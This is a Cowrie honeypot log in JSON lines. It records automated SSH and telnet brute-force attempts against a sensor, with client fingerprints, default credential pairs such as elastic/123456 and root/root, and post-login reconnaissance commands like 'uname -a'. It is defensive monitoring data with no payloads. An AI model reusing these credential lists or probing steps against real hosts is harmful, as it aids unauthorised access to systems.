{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:02:45.275588Z","src_ip":"115.190.94.119","session":"45e79e0986c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53716,"dst_ip":"1.2.3.4","dst_port":22,"session":"46af62ef3f3b","protocol":"ssh","message":"New connection: 212.227.125.160:53716 (1.2.3.4:22) [session: 46af62ef3f3b]","sensor":"my-vps","timestamp":"2025-08-31T02:02:58.445361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:02:59.279033Z","src_ip":"212.227.125.160","session":"46af62ef3f3b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:02:59.279742Z","src_ip":"212.227.125.160","session":"46af62ef3f3b"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"abc123","message":"login attempt [dspace/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:03:01.687421Z","src_ip":"212.227.125.160","session":"46af62ef3f3b"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:03:03.271627Z","src_ip":"212.227.125.160","session":"46af62ef3f3b"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":54418,"dst_ip":"1.2.3.4","dst_port":22,"session":"daa25945843d","protocol":"ssh","message":"New connection: 115.190.94.119:54418 (1.2.3.4:22) [session: daa25945843d]","sensor":"my-vps","timestamp":"2025-08-31T02:03:36.224583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:03:36.225843Z","src_ip":"115.190.94.119","session":"daa25945843d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:03:37.277429Z","src_ip":"115.190.94.119","session":"daa25945843d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45268,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb6e99de87fa","protocol":"ssh","message":"New connection: 212.227.235.229:45268 (1.2.3.4:22) [session: eb6e99de87fa]","sensor":"my-vps","timestamp":"2025-08-31T02:03:38.387656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:03:39.266588Z","src_ip":"212.227.235.229","session":"eb6e99de87fa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:03:39.267445Z","src_ip":"212.227.235.229","session":"eb6e99de87fa"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:03:45.841302Z","src_ip":"212.227.235.229","session":"eb6e99de87fa"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:03:47.728075Z","src_ip":"212.227.235.229","session":"eb6e99de87fa"}
{"eventid":"cowrie.session.connect","src_ip":"178.128.252.101","src_port":51566,"dst_ip":"1.2.3.4","dst_port":23,"session":"2cc79362a4e5","protocol":"telnet","message":"New connection: 178.128.252.101:51566 (1.2.3.4:23) [session: 2cc79362a4e5]","sensor":"my-vps","timestamp":"2025-08-31T02:03:49.777902Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T02:03:49.840629Z","src_ip":"178.128.252.101","session":"2cc79362a4e5"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T02:03:50.953401Z","src_ip":"178.128.252.101","session":"2cc79362a4e5"}
{"eventid":"cowrie.session.closed","duration":2.250401496887207,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:03:52.028238Z","src_ip":"178.128.252.101","session":"2cc79362a4e5"}
{"eventid":"cowrie.session.connect","src_ip":"178.128.252.101","src_port":51568,"dst_ip":"1.2.3.4","dst_port":23,"session":"827df63bb6ee","protocol":"telnet","message":"New connection: 178.128.252.101:51568 (1.2.3.4:23) [session: 827df63bb6ee]","sensor":"my-vps","timestamp":"2025-08-31T02:03:52.049999Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:03:52.193501Z","src_ip":"178.128.252.101","session":"827df63bb6ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:03:52.210114Z","src_ip":"178.128.252.101","session":"827df63bb6ee"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T02:03:53.952796Z","src_ip":"178.128.252.101","session":"827df63bb6ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"3.0","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:03:55.229231Z","src_ip":"178.128.252.101","session":"827df63bb6ee"}
{"eventid":"cowrie.session.closed","duration":3.1823205947875977,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:03:55.232229Z","src_ip":"178.128.252.101","session":"827df63bb6ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36012,"dst_ip":"1.2.3.4","dst_port":22,"session":"19f0483d2be3","protocol":"ssh","message":"New connection: 212.227.125.160:36012 (1.2.3.4:22) [session: 19f0483d2be3]","sensor":"my-vps","timestamp":"2025-08-31T02:04:00.010406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:04:00.708332Z","src_ip":"212.227.125.160","session":"19f0483d2be3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:04:00.709065Z","src_ip":"212.227.125.160","session":"19f0483d2be3"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:04:03.203652Z","src_ip":"212.227.125.160","session":"19f0483d2be3"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:04:04.943816Z","src_ip":"212.227.125.160","session":"19f0483d2be3"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:04:10.802868Z","src_ip":"115.190.94.119","session":"c3274071153c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:04:17.253155Z","src_ip":"176.65.149.186","session":"595861ac714d"}
{"eventid":"cowrie.session.closed","duration":180.0643014907837,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:04:17.256728Z","src_ip":"176.65.149.186","session":"595861ac714d"}
{"eventid":"cowrie.session.closed","duration":"301.0","message":"Connection lost after 301.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:04:19.007573Z","src_ip":"115.190.94.119","session":"a6b3c793d0d6"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":26417,"dst_ip":"1.2.3.4","dst_port":22,"session":"90e066e55c4a","protocol":"ssh","message":"New connection: 186.225.142.90:26417 (1.2.3.4:22) [session: 90e066e55c4a]","sensor":"my-vps","timestamp":"2025-08-31T02:04:38.222865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:04:38.223833Z","src_ip":"186.225.142.90","session":"90e066e55c4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:04:38.416289Z","src_ip":"186.225.142.90","session":"90e066e55c4a"}
{"eventid":"cowrie.login.success","username":"root","password":"11maart","message":"login attempt [root/11maart] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:04:38.996288Z","src_ip":"186.225.142.90","session":"90e066e55c4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:04:39.397250Z","src_ip":"186.225.142.90","session":"90e066e55c4a"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T02:04:39.397953Z","src_ip":"186.225.142.90","session":"90e066e55c4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:04:39.591736Z","src_ip":"186.225.142.90","session":"90e066e55c4a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:04:39.592816Z","src_ip":"186.225.142.90","session":"90e066e55c4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55118,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e34c53ae5d9","protocol":"ssh","message":"New connection: 212.227.235.229:55118 (1.2.3.4:22) [session: 1e34c53ae5d9]","sensor":"my-vps","timestamp":"2025-08-31T02:04:39.750841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:04:40.558127Z","src_ip":"212.227.235.229","session":"1e34c53ae5d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:04:40.559162Z","src_ip":"212.227.235.229","session":"1e34c53ae5d9"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"12345","message":"login attempt [elastic/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:04:46.767776Z","src_ip":"212.227.235.229","session":"1e34c53ae5d9"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:04:48.677523Z","src_ip":"212.227.235.229","session":"1e34c53ae5d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45724,"dst_ip":"1.2.3.4","dst_port":22,"session":"13b10637037a","protocol":"ssh","message":"New connection: 212.227.125.160:45724 (1.2.3.4:22) [session: 13b10637037a]","sensor":"my-vps","timestamp":"2025-08-31T02:05:01.996215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:05:02.810197Z","src_ip":"212.227.125.160","session":"13b10637037a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:05:02.811059Z","src_ip":"212.227.125.160","session":"13b10637037a"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"12345","message":"login attempt [elastic/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:05:04.961018Z","src_ip":"212.227.125.160","session":"13b10637037a"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:05:07.279010Z","src_ip":"212.227.125.160","session":"13b10637037a"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:05:36.245422Z","src_ip":"115.190.94.119","session":"daa25945843d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36664,"dst_ip":"1.2.3.4","dst_port":22,"session":"59aaba63d87d","protocol":"ssh","message":"New connection: 212.227.235.229:36664 (1.2.3.4:22) [session: 59aaba63d87d]","sensor":"my-vps","timestamp":"2025-08-31T02:05:41.474476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:05:42.293277Z","src_ip":"212.227.235.229","session":"59aaba63d87d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:05:42.294129Z","src_ip":"212.227.235.229","session":"59aaba63d87d"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"1234567","message":"login attempt [elastic/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:05:48.199060Z","src_ip":"212.227.235.229","session":"59aaba63d87d"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:05:49.906856Z","src_ip":"212.227.235.229","session":"59aaba63d87d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55356,"dst_ip":"1.2.3.4","dst_port":22,"session":"331172a2fc68","protocol":"ssh","message":"New connection: 212.227.125.160:55356 (1.2.3.4:22) [session: 331172a2fc68]","sensor":"my-vps","timestamp":"2025-08-31T02:06:03.055422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:06:03.583811Z","src_ip":"212.227.125.160","session":"331172a2fc68"}
